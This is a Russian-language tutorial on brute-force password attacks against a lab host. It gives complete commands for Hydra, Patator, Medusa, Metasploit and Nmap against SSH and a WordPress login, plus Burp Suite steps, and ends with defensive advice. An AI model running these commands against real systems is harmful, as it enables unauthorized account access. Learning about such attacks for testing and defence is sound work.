Brute-force атаки
Brute-force (полный перебор) – метод решения математических задач, на сложность которых влияет количество всех возможных решений. Термин принято использовать в контексте хакерских атак в том случае, когда злоумышленник данным способом подбирает логин и пароль к учетной записи пользователя или какому-либо сервису.
На сегодняшний день существует масса инструментов, с помощью которых можно выполнять Brute-force атаки, рассмотри их ниже.
Brute-force SSH
Понадобится тестовая машина 192.168.60.50. В данном случае будем подбирать пароль пользователя test по SSH и нам понадобится стандартный словарь rockyou.txt.
Patator
Используем команду:
patator ssh_login host=192.168.60.50 user=test password=FILE0 0=/root/wordlist -x ignore:mesg=’Authentication failed’
Hydra
Вводим команду:
hydra -V -f -t 4 -l test -P /root/wordlist ssh://192.168.60.50
Medusa
Применяем:
medusa -h 192.168.60.50 -u test -P /root/wordlist -M ssh -f -v 6
Metasploit
Нужно задействовать модуль:
use auxiliary/scanner/ssh/ssh_login
И указать необходимые параметры через команду "set".
Brute-force WordPress
Подбор пароля осуществляется методом авторизации веб-формы. Воспользуемся учетной записью администратора wordpress.
BurpSuite
Пробуем авторизоваться, используя любой пароль и логин. Делаем это ля просмотра запросов, проходящих через BurpSuite. Ищем POST запрос и работаем с ним. BODY содержит данную информацию и при желании мы можем подставлять любые нужные значения.
Далее передаем запрос через Intruder, в Payload Positions оставляем sniper (тип атаки), для проверки применяем pwd. Теперь остается загрузить словарь и начать атаку. Неверный пароль вернет код ответа 200, верный – 302.
Hydra
Пользуемся командой:
hydra -V -f -l admin -P /root/wordlist -t 4 http-post-form://192.168.60.50 -m "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.60.50%2Fwp-admin%2F&testcookie=1:S=302"
Patator работает по такому же принципу как Hydra.
Nmap
Позволяет производить пароль паролей для веб-форм авторизации. Для этого используем:
nmap 192.168.60.50 --script http-wordpress-brute --script-args 'user= admin,passdb= /root/wordlist, http-wordpress-brute.thread=3, brute.firstonly=true'
В заключение
В данном материале мы кратко пробежались по основным инструментам, с помощью которых можно подобрать пароль. И помните, чтобы избежать атак, не создавайте слишком простые пароли, или те, которые содержат личную информацию (дату рождения, фамилию и т.д.).
Обязательно ограничивайте подключение по IP-адресу, используйте двухфакторную аутентификацию, вовремя блокируйте атаки при помощи SIEM, WAF, fail2ban.
Читать статью на:
Для просмотра ссылки необходимо нажать
Вход или Регистрация